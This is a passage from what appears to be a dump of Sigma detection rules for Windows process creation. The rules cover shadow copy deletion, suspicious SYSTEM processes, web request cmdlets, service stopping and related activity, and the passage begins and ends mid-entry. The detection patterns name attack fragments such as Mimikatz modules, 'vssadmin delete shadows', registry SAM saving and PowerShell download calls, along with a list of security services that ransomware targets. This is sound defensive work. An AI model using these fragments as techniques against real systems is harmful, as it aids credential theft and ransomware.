'ntrtscan'\n            - 'nvspwmi'\n            - 'ofcservice'\n            - 'Online Protection System'\n            - 'OracleClientCache80'\n            - 'OracleDBConsole'\n            - 'OracleMTSRecoveryService'\n            - 'OracleOraDb11g_home1'\n            - 'OracleService'\n            - 'OracleVssWriter'\n            - 'osppsvc'\n            - 'PandaAetherAgent'\n            - 'PccNTUpd'\n            - 'PDVFSService'\n            - 'POP3Svc'\n            - 'postgresql-x64-9.4'\n            - 'POVFSService'\n            - 'PSUAService'\n            - 'Quick Update Service'\n            - 'RepairService'\n            - 'ReportServer'\n            - 'ReportServer$'\n            - 'RESvc'\n            - 'RpcEptMapper'\n            - 'sacsvr'\n            - 'SamSs'\n            - 'SAVAdminService'\n            - 'SAVService'\n            - 'ScSecSvc'\n            - 'SDRSVC'\n            - 'SearchExchangeTracing'\n            - 'sense'\n            - 'SentinelAgent'\n            - 'SentinelHelperService'\n            - 'SepMasterService'\n            - 'ShMonitor'\n            - 'Smcinst'\n            - 'SmcService'\n            - 'SMTPSvc'\n            - 'SNAC'\n            - 'SntpService'\n            - 'Sophos'\n            - 'SQ1SafeOLRService'\n            - 'SQL Backups'\n            - 'SQL Server'\n            - 'SQLAgent'\n            - 'SQLANYs_Sage_FAS_Fixed_Assets'\n            - 'SQLBrowser'\n            - 'SQLsafe'\n            - 'SQLSERVERAGENT'\n            - 'SQLTELEMETRY'\n            - 'SQLWriter'\n            - 'SSISTELEMETRY130'\n            - 'SstpSvc'\n            - 'storflt'\n            - 'svcGenericHost'\n            - 'swc_service'\n            - 'swi_filter'\n            - 'swi_service'\n            - 'swi_update'\n            - 'Symantec'\n            - 'sysmon'\n            - 'TeamViewer'\n            - 'Telemetryserver'\n            - 'ThreatLockerService'\n            - 'TMBMServer'\n            - 'TmCCSF'\n            - 'TmFilter'\n            - 'TMiCRCScanService'\n            - 'tmlisten'\n            - 'TMLWCSService'\n            - 'TmPfw'\n            - 'TmPreFilter'\n            - 'TmProxy'\n            - 'TMSmartRelayService'\n            - 'tmusa'\n            - 'Tomcat'\n            - 'Trend Micro Deep Security Manager'\n            - 'TrueKey'\n            - 'UFNet'\n            - 'UI0Detect'\n            - 'UniFi'\n            - 'UTODetect'\n            - 'vds'\n            - 'Veeam'\n            - 'VeeamDeploySvc'\n            - 'Veritas System Recovery'\n            - 'vmic'\n            - 'VMTools'\n            - 'vmvss'\n            - 'VSApiNt'\n            - 'VSS'\n            - 'W3Svc'\n            - 'wbengine'\n            - 'WdNisSvc'\n            - 'WeanClOudSve'\n            - 'Weems JY'\n            - 'WinDefend'\n            - 'wmms'\n            - 'wozyprobackup'\n            - 'WPFFontCache_v0400'\n            - 'WRSVC'\n            - 'wsbexchange'\n            - 'WSearch'\n            - 'wscsvc'\n            - 'Zoolz 2 Service'\n    condition: all of selection_*\nfalsepositives:\n    - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml",
    "content": "title: Shadow Copies Creation Using Operating Systems Utilities\nid: b17ea6f7-6e90-447e-a799-e6c0a493d6ce\nstatus: test\ndescription: Shadow Copies creation using operating systems utilities, possible credential access\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/\nauthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2019-10-22\nmodified: 2022-11-10\ntags:\n    - attack.credential-access\n    - attack.t1003\n    - attack.t1003.002\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wmic.exe'\n              - '\\vssadmin.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wmic.exe'\n              - 'VSSADMIN.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'shadow'\n            - 'create'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administrator working with shadow copies, access for backup purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml",
    "content": "title: Shadow Copies Deletion Using Operating Systems Utilities\nid: c947b146-0abc-4c87-9c64-b17e9d7274a2\nstatus: stable\ndescription: Shadow Copies deletion using operating systems utilities\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://blog.talosintelligence.com/2017/05/wannacry.html\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\n    - https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/\n    - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100\n    - https://github.com/Neo23x0/Raccine#the-process\n    - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\nauthor: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)\ndate: 2019-10-22\nmodified: 2022-11-03\ntags:\n    - attack.defense-evasion\n    - attack.impact\n    - attack.t1070\n    - attack.t1490\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\wmic.exe'\n              - '\\vssadmin.exe'\n              - '\\diskshadow.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'wmic.exe'\n              - 'VSSADMIN.EXE'\n              - 'diskshadow.exe'\n    selection1_cli:\n        CommandLine|contains|all:\n            - 'shadow'  # will match \"delete shadows\" and \"shadowcopy delete\" and \"shadowstorage\"\n            - 'delete'\n    selection2_img:\n        - Image|endswith: '\\wbadmin.exe'\n        - OriginalFileName: 'WBADMIN.EXE'\n    selection2_cli:\n        CommandLine|contains|all:\n            - 'delete'\n            - 'catalog'\n            - 'quiet' # will match -quiet or /quiet\n    selection3_img:\n        - Image|endswith: '\\vssadmin.exe'\n        - OriginalFileName: 'VSSADMIN.EXE'\n    selection3_cli:\n        CommandLine|contains|all:\n            - 'resize'\n            - 'shadowstorage'\n        CommandLine|contains:\n            - 'unbounded'\n            - '/MaxSize='\n    condition: (all of selection1*) or (all of selection2*) or (all of selection3*)\nfalsepositives:\n    - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason\n    - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml",
    "content": "title: Windows Shell/Scripting Processes Spawning Suspicious Programs\nid: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde\nstatus: test\ndescription: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.\nreferences:\n    - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html\nauthor: Florian Roth (Nextron Systems), Tim Shelton\ndate: 2018-04-06\nmodified: 2023-05-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.005\n    - attack.t1059.001\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            # - '\\cmd.exe'  # too many false positives\n            - '\\rundll32.exe'\n            - '\\cscript.exe'\n            - '\\wscript.exe'\n            - '\\wmiprvse.exe'\n            - '\\regsvr32.exe'\n        Image|endswith:\n            - '\\schtasks.exe'\n            - '\\nslookup.exe'\n            - '\\certutil.exe'\n            - '\\bitsadmin.exe'\n            - '\\mshta.exe'\n    filter_ccmcache:\n        CurrentDirectory|contains: '\\ccmcache\\'\n    filter_amazon:\n        ParentCommandLine|contains:\n            # FP - Amazon Workspaces\n            - '\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\setup-scheduledtask.ps1'\n            - '\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\set-selfhealing.ps1'\n            - '\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\check-workspacehealth.ps1'\n            - '\\nessus_' # Tenable/Nessus VA Scanner\n    filter_nessus:\n        CommandLine|contains: '\\nessus_' # Tenable/Nessus VA Scanner\n    filter_sccm_install:\n        ParentImage|endswith: '\\mshta.exe'\n        Image|endswith: '\\mshta.exe'\n        ParentCommandLine|contains|all:\n            - 'C:\\MEM_Configmgr_'\n            - '\\splash.hta'\n            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'\n        CommandLine|contains|all:\n            - 'C:\\MEM_Configmgr_'\n            - '\\SMSSETUP\\BIN\\'\n            - '\\autorun.hta'\n            - '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Administrative scripts\n    - Microsoft SCCM\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_sysnative.yml",
    "content": "title: Process Creation Using Sysnative Folder\nid: 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab\nstatus: test\ndescription: Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)\nreferences:\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Max Altgelt (Nextron Systems)\ndate: 2022-08-23\nmodified: 2025-10-08\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine|contains: ':\\Windows\\Sysnative\\'\n        - Image|contains: ':\\Windows\\Sysnative\\'\n    filter_main_ngen:\n        Image|contains:\n            - 'C:\\Windows\\Microsoft.NET\\Framework64\\v'\n            - 'C:\\Windows\\Microsoft.NET\\Framework\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm\\v'\n            - 'C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v'\n        Image|endswith: '\\ngen.exe'\n        CommandLine|contains: 'install'\n    filter_optional_xampp:\n        CommandLine|contains|all:\n            - '\"C:\\Windows\\sysnative\\cmd.exe\"'\n            - '\\xampp\\'\n            - '\\catalina_start.bat'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml",
    "content": "title: System File Execution Location Anomaly\nid: e4a6b256-3e47-40fc-89d2-7a477edd6915\nrelated:\n    - id: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd # Dedicated SvcHost rule\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.\nreferences:\n    - https://twitter.com/GelosSnake/status/934900723426439170\n    - https://asec.ahnlab.com/en/39828/\n    - https://www.splunk.com/en_us/blog/security/inno-setup-malware-redline-stealer-campaign.html\nauthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2017-11-27\nmodified: 2026-02-12\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\atbroker.exe'\n            - '\\audiodg.exe'\n            - '\\bcdedit.exe'\n            - '\\bitsadmin.exe'\n            - '\\certreq.exe'\n            - '\\certutil.exe'\n            - '\\cmstp.exe'\n            - '\\conhost.exe'\n            - '\\consent.exe'\n            - '\\cscript.exe'\n            - '\\csrss.exe'\n            - '\\dashost.exe'\n            - '\\defrag.exe'\n            - '\\dfrgui.exe' # Was seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/\n            - '\\dism.exe'\n            - '\\dllhost.exe'\n            - '\\dllhst3g.exe'\n            - '\\dwm.exe'\n            - '\\eventvwr.exe'\n            - '\\fsquirt.exe' # was seen used by sidewinder APT - https://securelist.com/sidewinder-apt/114089/\n            - '\\finger.exe'\n            - '\\logonui.exe'\n            - '\\LsaIso.exe'\n            - '\\lsass.exe'\n            - '\\lsm.exe'\n            - '\\msiexec.exe'\n            - '\\ntoskrnl.exe'\n            - '\\powershell_ise.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\runonce.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\schtasks.exe'\n            - '\\services.exe'\n            - '\\sihost.exe'\n            - '\\smartscreen.exe'\n            - '\\smss.exe'\n            - '\\spoolsv.exe'\n            - '\\svchost.exe'\n            - '\\taskhost.exe'\n            - '\\taskhostw.exe'\n            - '\\Taskmgr.exe'\n            - '\\userinit.exe'\n            - '\\werfault.exe'\n            - '\\werfaultsecure.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n            - '\\winver.exe'\n            - '\\wlanext.exe'\n            - '\\wscript.exe'\n            - '\\wsl.exe'\n            - '\\wsmprovhost.exe' # Was seen used by Lazarus Group - https://asec.ahnlab.com/en/39828/\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SystemTemp\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\uus\\'\n            - 'C:\\Windows\\WinSxS\\'\n    filter_optional_system32:\n        Image|contains: '\\SystemRoot\\System32\\'\n    filter_main_powershell:\n        Image|contains:\n            - 'C:\\Program Files\\PowerShell\\7\\'\n            - 'C:\\Program Files\\PowerShell\\7-preview\\'\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview' # pwsh installed from Microsoft Store\n        Image|endswith: '\\pwsh.exe'\n    filter_main_wsl_programfiles:\n        Image|startswith:\n            - 'C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux'\n            - 'C:\\Program Files\\WSL\\'\n        Image|endswith: '\\wsl.exe'\n    filter_main_wsl_appdata:\n        Image|startswith: C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n        Image|endswith: '\\wsl.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml",
    "content": "title: Suspicious SYSTEM User Process Creation\nid: 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09\nstatus: test\ndescription: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)\nreferences:\n    - Internal Research\n    - https://tools.thehacker.recipes/mimikatz/modules\nauthor: Florian Roth (Nextron Systems), David ANDRE (additional keywords)\ndate: 2021-12-20\nmodified: 2025-10-19\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134\n    - attack.t1003\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'System'\n            - 'S-1-16-16384'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_special:\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cscript.exe'\n              - '\\forfiles.exe'\n              - '\\hh.exe'\n              - '\\mshta.exe'\n              - '\\ping.exe'\n              - '\\wscript.exe'\n        - CommandLine|re: 'net\\s+user\\s+'\n        - CommandLine|contains:\n              # - 'sc stop ' # stops a system service # causes FPs\n              - ' -NoP '  # Often used in malicious PowerShell commands\n              - ' -W Hidden '  # Often used in malicious PowerShell commands\n              - ' -decode '  # Used with certutil\n              - ' /decode '  # Used with certutil\n              - ' /urlcache '  # Used with certutil\n              - ' -urlcache '  # Used with certutil\n              - ' -e* JAB'  # PowerShell encoded commands\n              - ' -e* SUVYI'  # PowerShell encoded commands\n              - ' -e* SQBFAFgA'  # PowerShell encoded commands\n              - ' -e* aWV4I'  # PowerShell encoded commands\n              - ' -e* IAB'  # PowerShell encoded commands\n              - ' -e* PAA'  # PowerShell encoded commands\n              - ' -e* aQBlAHgA'  # PowerShell encoded commands\n              - 'vssadmin delete shadows'  # Ransomware\n              - 'reg SAVE HKLM'  # save registry SAM - syskey extraction\n              - ' -ma '  # ProcDump\n              - 'Microsoft\\Windows\\CurrentVersion\\Run'  # Run key in command line - often in combination with REG ADD\n              - '.downloadstring('  # PowerShell download command\n              - '.downloadfile('  # PowerShell download command\n              - ' /ticket:'  # Rubeus\n              - 'dpapi::'     # Mimikatz\n              - 'event::clear'        # Mimikatz\n              - 'event::drop'     # Mimikatz\n              - 'id::modify'      # Mimikatz\n              - 'kerberos::'       # Mimikatz\n              - 'lsadump::'      # Mimikatz\n              - 'misc::'     # Mimikatz\n              - 'privilege::'       # Mimikatz\n              - 'rpc::'      # Mimikatz\n              - 'sekurlsa::'       # Mimikatz\n              - 'sid::'        # Mimikatz\n              - 'token::'      # Mimikatz\n              - 'vault::cred'     # Mimikatz\n              - 'vault::list'     # Mimikatz\n              - ' p::d '  # Mimikatz\n              - ';iex('  # PowerShell IEX\n              - 'MiniDump'  # Process dumping method apart from procdump\n    filter_main_ping:\n        CommandLine|contains|all:\n            - 'ping'\n            - '127.0.0.1'\n            - ' -n '\n    filter_vs:\n        Image|endswith: '\\PING.EXE'\n        ParentCommandLine|contains: '\\DismFoDInstall.cmd'\n    filter_config_mgr:\n        ParentImage|contains: ':\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\'\n    filter_java:\n        ParentImage|contains:\n            - ':\\Program Files (x86)\\Java\\'\n            - ':\\Program Files\\Java\\'\n        ParentImage|endswith: '\\bin\\javaws.exe'\n        Image|contains:\n            - ':\\Program Files (x86)\\Java\\'\n            - ':\\Program Files\\Java\\'\n        Image|endswith: '\\bin\\jp2launcher.exe'\n        CommandLine|contains: ' -ma '\n    condition: all of selection* and not 1 of filter_*\nfalsepositives:\n    - Administrative activity\n    - Scripts and administrative tools used in the monitored environment\n    - Monitoring activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml",
    "content": "title: Suspicious SYSVOL Domain Group Policy Access\nid: 05f3c945-dcc8-4393-9f3d-af65077a8f86\nstatus: test\ndescription: Detects Access to Domain Group Policies stored in SYSVOL\nreferences:\n    - https://adsecurity.org/?p=2288\n    - https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100\nauthor: Markus Neis, Jonhnathan Ribeiro, oscd.community\ndate: 2018-04-09\nmodified: 2022-01-07\ntags:\n    - attack.credential-access\n    - attack.t1552.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\SYSVOL\\'\n            - '\\policies\\'\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_task_folder_evasion.yml",
    "content": "title: Tasks Folder Evasion\nid: cc4e02ba-9c06-48e2-b09e-2500cace9ae0\nstatus: test\ndescription: |\n    The Tasks folder in system32 and syswow64 are globally writable paths.\n    Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application\n    in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\nreferences:\n    - https://twitter.com/subTee/status/1216465628946563073\n    - https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26\nauthor: Sreeman\ndate: 2020-01-13\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.execution\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection1:\n        CommandLine|contains:\n            - 'echo '\n            - 'copy '\n            - 'type '\n            - 'file createnew'\n    selection2:\n        CommandLine|contains:\n            - ' C:\\Windows\\System32\\Tasks\\'\n            - ' C:\\Windows\\SysWow64\\Tasks\\'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml",
    "content": "title: Malicious Windows Script Components File Execution by TAEF Detection\nid: 634b00d5-ccc3-4a06-ae3b-0ec8444dd51b\nstatus: test\ndescription: |\n  Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\n  Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\nreferences:\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/\n    - https://twitter.com/pabraeken/status/993298228840992768\n    - https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/\nauthor: 'Agro (@agro_sev) oscd.community'\ndate: 2020-10-13\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\te.exe'\n        - ParentImage|endswith: '\\te.exe'\n        - OriginalFileName: '\\te.exe'\n    condition: selection\nfalsepositives:\n    - It's not an uncommon to use te.exe directly to execute legal TAEF tests\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml",
    "content": "title: Malicious PE Execution by Microsoft Visual Studio Debugger\nid: 15c7904e-6ad1-4a45-9b46-5fb25df37fd2\nstatus: test\ndescription: |\n  There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\n  This option may be used adversaries to execute malicious code by signed verified binary.\n  The debugger is installed alongside with Microsoft Visual Studio package.\nreferences:\n    - https://twitter.com/pabraeken/status/990758590020452353\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/\n    - https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019\nauthor: Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community\ndate: 2020-10-14\nmodified: 2022-10-09\ntags:\n    - attack.t1218\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\vsjitdebugger.exe'\n    reduction1:\n        Image|endswith: '\\vsimmersiveactivatehelper*.exe'\n    reduction2:\n        Image|endswith: '\\devenv.exe'\n    condition: selection and not (reduction1 or reduction2)\nfalsepositives:\n    - The process spawned by vsjitdebugger.exe is uncommon.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml",
    "content": "title: Suspicious Userinit Child Process\nid: b655a06a-31c0-477a-95c2-3726b83d649d\nstatus: test\ndescription: Detects a suspicious child process of userinit\nreferences:\n    - https://twitter.com/SBousseaden/status/1139811587760562176\nauthor: Florian Roth (Nextron Systems), Samir Bousseaden (idea)\ndate: 2019-06-17\nmodified: 2025-10-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\userinit.exe'\n    filter_main_netlogon:\n        CommandLine|contains: '\\netlogon\\'\n    filter_main_explorer:\n        - Image|endswith: '\\explorer.exe'\n        - OriginalFileName: 'explorer.exe'\n        - CommandLine: 'C:\\Windows\\Explorer.EXE'\n    filter_main_null:\n        Image: null\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Administrative scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_velociraptor_child_process.yml",
    "content": "title: Suspicious Velociraptor Child Process\nid: 4bc90587-e6ca-4b41-be0b-ed4d04e4ed0c\nstatus: experimental\ndescription: Detects the suspicious use of the Velociraptor DFIR tool to execute other tools or download additional payloads, as seen in a campaign where it was abused for remote access and to stage further attacks.\nreferences:\n    - https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-08-29\ntags:\n    - attack.command-and-control\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1219\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\Velociraptor.exe'\n    selection_child_vscode_tunnel:\n        CommandLine|contains|all:\n            - 'code.exe'\n            - 'tunnel'\n            - '--accept-server-license-terms'\n    selection_child_msiexec:\n        CommandLine|contains|all:\n            - 'msiexec'\n            - '/i'\n            - 'http'\n    selection_child_powershell:\n        Image|endswith:\n            - '\\powershell.exe'\n            - '\\powershell_ise.exe'\n            - '\\pwsh.exe'\n        CommandLine|contains:\n            - 'Invoke-WebRequest '\n            - 'IWR '\n            - '.DownloadFile'\n            - '.DownloadString'\n    # Add more child process patterns as needed\n    condition: selection_parent and 1 of selection_child_*\nfalsepositives:\n    - Legitimate administrators or incident responders might use Velociraptor to execute scripts or tools. However, the combination of Velociraptor spawning these specific processes with these command lines is suspicious. Tuning may be required to exclude known administrative actions or specific scripts.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml",
    "content": "title: Weak or Abused Passwords In CLI\nid: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4\nstatus: test\ndescription: |\n    Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.\n    An example would be a threat actor creating a new user via the net command and providing the password inline\nreferences:\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments\n    - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\n    - https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-14\nmodified: 2024-02-23\ntags:\n    - attack.defense-evasion\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # Add more passwords\n            - '123456789'\n            - '123123qwE'\n            - 'Asd123.aaaa'\n            - 'Decryptme'\n            - 'P@ssw0rd!'\n            - 'Pass8080'\n            - 'password123' # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/\n            - 'test@202' # Covers multiple years\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the passwords by users via commandline (should be discouraged)\n    - Other currently unknown false positives\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml",
    "content": "title: Usage Of Web Request Commands And Cmdlets\nid: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d\nrelated:\n    - id: 1139d2e2-84b1-4226-b445-354492eba8ba\n      type: similar\n    - id: f67dbfce-93bc-440d-86ad-a95ae8858c90\n      type: obsolete\n    - id: cd5c8085-4070-4e22-908d-a5b3342deb74\n      type: obsolete\n    - id: 6e897651-f157-4d8f-aaeb-df8151488385\n      type: obsolete\nstatus: test\ndescription: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine\nreferences:\n    - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/\n    - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell\n    - https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps\nauthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger\ndate: 2019-10-24\nmodified: 2025-10-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '[System.Net.WebRequest]::create'\n            - 'curl '\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring\n            - 'iwr '\n            # - 'Net.WebClient' # There are various other rules that cover this, so it is commented out\n            - 'Resume-BitsTransfer'\n            - 'Start-BitsTransfer'\n            - 'wget '\n            - 'WinHttp.WinHttpRequest'\n    condition: selection\nfalsepositives:\n    - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml",
